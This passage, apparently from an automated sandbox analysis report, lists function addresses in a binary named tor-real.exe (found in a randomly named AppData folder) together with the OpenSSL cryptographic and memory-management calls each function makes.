Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A0EE0 EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,	25_2_6C0A0EE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DEF43 CRYPTO_clear_free,EVP_PKEY_free,	25_2_6C0DEF43
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C094F70 CRYPTO_free,	25_2_6C094F70
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DEF89 CRYPTO_clear_free,	25_2_6C0DEF89
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E4FA7 CRYPTO_malloc,	25_2_6C0E4FA7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D4FA6 CRYPTO_free,EVP_MD_CTX_free,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,	25_2_6C0D4FA6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09CFC4 EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,	25_2_6C09CFC4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A800 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,	25_2_6C09A800
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE844 CRYPTO_free,	25_2_6C0BE844
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC860 memcmp,time,CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,	25_2_6C0BC860
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C28A8 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,	25_2_6C0C28A8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E48B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0E48B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE8E5 CRYPTO_free,CRYPTO_strdup,CRYPTO_free,__stack_chk_fail,	25_2_6C0BE8E5
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E28F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,ERR_put_error,ERR_put_error,	25_2_6C0E28F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CC919 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,	25_2_6C0CC919
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C0949 OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,	25_2_6C0C0949
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BA940 CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C0BA940
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A946 CRYPTO_free,CRYPTO_malloc,	25_2_6C09A946
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09696C CRYPTO_free,CRYPTO_free,	25_2_6C09696C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D2960 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,	25_2_6C0D2960
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E4974 CRYPTO_free,	25_2_6C0E4974
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0969D0 CRYPTO_free,	25_2_6C0969D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D89E0 CRYPTO_memcmp,memcpy,memcpy,__stack_chk_fail,	25_2_6C0D89E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D49F0 __stack_chk_fail,__stack_chk_fail,CRYPTO_free,EVP_MD_CTX_free,EVP_MD_CTX_new,EVP_PKEY_size,CRYPTO_malloc,EVP_DigestSignInit,EVP_DigestSign,CRYPTO_free,EVP_MD_CTX_free,BUF_reverse,EVP_DigestUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,RSA_pkey_ctx_ctrl,RSA_pkey_ctx_ctrl,__stack_chk_fail,	25_2_6C0D49F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E49F0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0E49F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C2A0C CRYPTO_memcmp,	25_2_6C0C2A0C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B6A2B CRYPTO_malloc,CRYPTO_free,ERR_put_error,	25_2_6C0B6A2B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CEA50 OPENSSL_sk_new_null,X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,__stack_chk_fail,CRYPTO_free,	25_2_6C0CEA50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B2A73 ERR_put_error,CRYPTO_free,	25_2_6C0B2A73
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C6A8B CRYPTO_free,CRYPTO_free,CRYPTO_memdup,	25_2_6C0C6A8B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C094A80 CRYPTO_zalloc,CRYPTO_free,ERR_put_error,BUF_MEM_grow,	25_2_6C094A80
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C4A86 CRYPTO_free,CRYPTO_memdup,	25_2_6C0C4A86
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E4AEC CRYPTO_malloc,CRYPTO_free,	25_2_6C0E4AEC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ACAE0 OPENSSL_init_crypto,CRYPTO_THREAD_run_once,ERR_put_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,	25_2_6C0ACAE0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096B00 CRYPTO_free,	25_2_6C096B00
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B4B18 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,	25_2_6C0B4B18
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ACB24 CRYPTO_THREAD_run_once,	25_2_6C0ACB24
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BAB3C CRYPTO_realloc,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,	25_2_6C0BAB3C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CEB59 X509_free,OPENSSL_sk_pop_free,d2i_X509,CRYPTO_free,OPENSSL_sk_push,ERR_clear_error,OPENSSL_sk_value,X509_get0_pubkey,EVP_PKEY_missing_parameters,X509_free,X509_up_ref,	25_2_6C0CEB59
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09AB50 CRYPTO_free,	25_2_6C09AB50
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ACBB4 CRYPTO_THREAD_run_once,	25_2_6C0ACBB4
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AEBEB CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,	25_2_6C0AEBEB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0ACBE7 CRYPTO_THREAD_run_once,	25_2_6C0ACBE7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA419 CRYPTO_free,CRYPTO_mem_ctrl,ERR_put_error,	25_2_6C0AA419
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE421 CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0AE421
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B2426 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,ERR_put_error,	25_2_6C0B2426
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096440 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C096440
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096453 CRYPTO_free,CRYPTO_free,	25_2_6C096453
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C2469 CRYPTO_free,	25_2_6C0C2469
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D0460 CRYPTO_clear_free,	25_2_6C0D0460
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B247C CRYPTO_memdup,CRYPTO_free,	25_2_6C0B247C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0964AC CRYPTO_free,CRYPTO_free,	25_2_6C0964AC
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0944C0 CRYPTO_free,	25_2_6C0944C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CE4D6 CRYPTO_free,	25_2_6C0CE4D6
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B24D7 CRYPTO_free,	25_2_6C0B24D7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC500 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,__stack_chk_fail,	25_2_6C0BC500
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096504 CRYPTO_free,CRYPTO_free,	25_2_6C096504
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09453C CRYPTO_free,	25_2_6C09453C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D0533 CRYPTO_clear_free,	25_2_6C0D0533
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D455B CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0D455B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CC55B X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,	25_2_6C0CC55B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AC590 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,	25_2_6C0AC590
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A5A0 CRYPTO_free,	25_2_6C09A5A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0965A0 CRYPTO_free,	25_2_6C0965A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D25A0 CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,__stack_chk_fail,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,	25_2_6C0D25A0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A61C CRYPTO_malloc,malloc,	25_2_6C09A61C
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AC640 CRYPTO_strdup,CRYPTO_free,strlen,CRYPTO_free,	25_2_6C0AC640
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DA647 CRYPTO_malloc,EVP_CIPHER_CTX_new,HMAC_CTX_new,EVP_CIPHER_CTX_iv_length,EVP_EncryptUpdate,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,EVP_MD_size,RAND_bytes,time,CRYPTO_free,CRYPTO_memdup,EVP_aes_256_cbc,EVP_CIPHER_iv_length,RAND_bytes,EVP_EncryptInit_ex,EVP_sha256,HMAC_Init_ex,CRYPTO_free,EVP_CIPHER_CTX_free,HMAC_CTX_free,__stack_chk_fail,EVP_EncryptFinal,HMAC_Update,HMAC_Final,	25_2_6C0DA647
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C0640 EVP_MD_size,EVP_MD_CTX_new,EVP_DigestInit_ex,EVP_DigestFinal_ex,OPENSSL_cleanse,OPENSSL_cleanse,EVP_PKEY_free,EVP_MD_CTX_free,EVP_DigestInit_ex,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_PKEY_new_raw_private_key,EVP_DigestSignInit,EVP_DigestUpdate,EVP_DigestSignFinal,CRYPTO_memcmp,BIO_ctrl,EVP_DigestUpdate,__stack_chk_fail,	25_2_6C0C0640
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C094670 CRYPTO_zalloc,ERR_put_error,BUF_MEM_grow,BUF_MEM_grow,	25_2_6C094670
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE670 EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,ERR_put_error,CRYPTO_realloc,CRYPTO_realloc,memset,ERR_put_error,	25_2_6C0AE670
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A4670 ASN1_item_d2i,ERR_put_error,ASN1_item_free,ASN1_item_free,ERR_put_error,memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,ASN1_item_free,ERR_put_error,time,ERR_put_error,__stack_chk_fail,	25_2_6C0A4670
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B2675 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,OPENSSL_LH_new,X509_STORE_new,CTLOG_STORE_new,OPENSSL_sk_num,X509_VERIFY_PARAM_new,EVP_get_digestbyname,EVP_get_digestbyname,OPENSSL_sk_new_null,OPENSSL_sk_new_null,CRYPTO_new_ex_data,CRYPTO_secure_zalloc,RAND_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,ERR_put_error,ERR_put_error,RAND_priv_bytes,RAND_priv_bytes,ERR_put_error,ERR_put_error,	25_2_6C0B2675
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC690 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,	25_2_6C0BC690
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AC6A3 CRYPTO_free,	25_2_6C0AC6A3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C26A3 CRYPTO_free,CRYPTO_memdup,strcmp,strlen,OPENSSL_cleanse,CRYPTO_memcmp,OPENSSL_cleanse,__stack_chk_fail,memset,EVP_MD_size,__stack_chk_fail,time,EVP_MD_size,EVP_MD_size,__stack_chk_fail,	25_2_6C0C26A3
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE6B8 CRYPTO_free,	25_2_6C0BE6B8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C46BB EVP_PKEY_new,EVP_PKEY_copy_parameters,EVP_PKEY_set1_tls_encodedpoint,EVP_PKEY_free,EVP_PKEY_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,CRYPTO_memdup,	25_2_6C0C46BB
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09A6B0 CRYPTO_free,CRYPTO_malloc,	25_2_6C09A6B0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC6B7 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,	25_2_6C0BC6B7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0966E0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0966E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0E26E0 CRYPTO_free,	25_2_6C0E26E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C096713 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,	25_2_6C096713
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE710 CRYPTO_free,	25_2_6C0BE710
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D2747 CRYPTO_free,CRYPTO_free,CRYPTO_free,	25_2_6C0D2747
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE760 CRYPTO_free,CRYPTO_free,	25_2_6C0BE760
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC7A1 CRYPTO_THREAD_unlock,	25_2_6C0BC7A1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE7B1 CRYPTO_free,	25_2_6C0BE7B1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC7D9 CRYPTO_THREAD_unlock,	25_2_6C0BC7D9
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0A47E1 memcpy,memcpy,X509_free,memcpy,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,CRYPTO_free,CRYPTO_free,ASN1_item_free,	25_2_6C0A47E1
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D87E0 CRYPTO_malloc,memcpy,	25_2_6C0D87E0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BE7F7 CRYPTO_free,	25_2_6C0BE7F7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA006 CRYPTO_malloc,ERR_put_error,	25_2_6C0AA006
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CC000 __stack_chk_fail,X509_get0_pubkey,EVP_PKEY_get0_RSA,CRYPTO_malloc,RAND_bytes,EVP_PKEY_CTX_new,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_PKEY_get0_DH,DH_get0_key,BN_num_bits,BN_bn2bin,EVP_PKEY_free,CRYPTO_clear_free,EVP_PKEY_CTX_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,EVP_PKEY_free,	25_2_6C0CC000
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DE01B CRYPTO_memdup,	25_2_6C0DE01B
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AC050 CRYPTO_zalloc,	25_2_6C0AC050
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0DE0C7 CRYPTO_free,CRYPTO_memdup,	25_2_6C0DE0C7
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0EA0C0 SRP_Verify_B_mod_N,SRP_Calc_u,SRP_Calc_x,SRP_Calc_client_key,BN_num_bits,CRYPTO_malloc,BN_bn2bin,BN_clear_free,BN_clear_free,strlen,CRYPTO_clear_free,BN_clear_free,BN_clear_free,BN_clear_free,	25_2_6C0EA0C0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE0F2 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	25_2_6C0AE0F2
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0BC0F0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,CRYPTO_THREAD_unlock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,OPENSSL_LH_retrieve,	25_2_6C0BC0F0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0B4120 OPENSSL_sk_num,OPENSSL_sk_num,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,X509_free,OPENSSL_sk_new_reserve,OPENSSL_sk_value,EVP_MD_size,CRYPTO_zalloc,CRYPTO_malloc,memcpy,d2i_X509,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,d2i_PUBKEY,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,X509_VERIFY_PARAM_get_depth,X509_VERIFY_PARAM_set_depth,CRYPTO_dup_ex_data,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,EVP_MD_CTX_free,EVP_MD_CTX_free,X509_VERIFY_PARAM_inherit,OPENSSL_sk_dup,OPENSSL_sk_dup,ERR_put_error,ERR_put_error,ERR_put_error,memcpy,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,ERR_put_error,ERR_put_error,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,X509_get0_pubkey,OPENSSL_sk_push,ERR_put_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_put_error,EVP_PKEY_free,X509_free,OPENSSL_sk_new_null,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,__stack_chk_fail,EVP_CIPHER_CTX_free,EVP_CIPHER_CTX_free,COMP_CTX_free,COMP_CTX_free,	25_2_6C0B4120
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE138 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,	25_2_6C0AE138
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AE180 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,__stack_chk_fail,X509_VERIFY_PARAM_set_purpose,	25_2_6C0AE180
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CE1A8 CRYPTO_free,	25_2_6C0CE1A8
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0D41D0 __stack_chk_fail,CRYPTO_malloc,memcpy,CRYPTO_malloc,ERR_put_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_put_error,EVP_CIPHER_CTX_free,EVP_MD_CTX_free,__stack_chk_fail,	25_2_6C0D41D0
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C2234 EVP_PKEY_get1_tls_encodedpoint,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,__stack_chk_fail,CRYPTO_free,	25_2_6C0C2234
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0AA230 CRYPTO_THREAD_run_once,	25_2_6C0AA230
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0C6230 memchr,CRYPTO_free,CRYPTO_strndup,	25_2_6C0C6230
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C092236 CRYPTO_zalloc,CRYPTO_free,	25_2_6C092236
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CE246 CRYPTO_free,	25_2_6C0CE246
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C09C260 memset,__stack_chk_fail,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,COMP_expand_block,CRYPTO_malloc,EVP_MD_CTX_md,EVP_MD_CTX_md,EVP_MD_size,CRYPTO_memcmp,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,EVP_CIPHER_CTX_cipher,EVP_CIPHER_flags,strncmp,strncmp,strncmp,__stack_chk_fail,	25_2_6C09C260
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C092263 CRYPTO_zalloc,	25_2_6C092263
Source: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe	Code function: 25_2_6C0CC279 EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,	25_2_6C0CC279
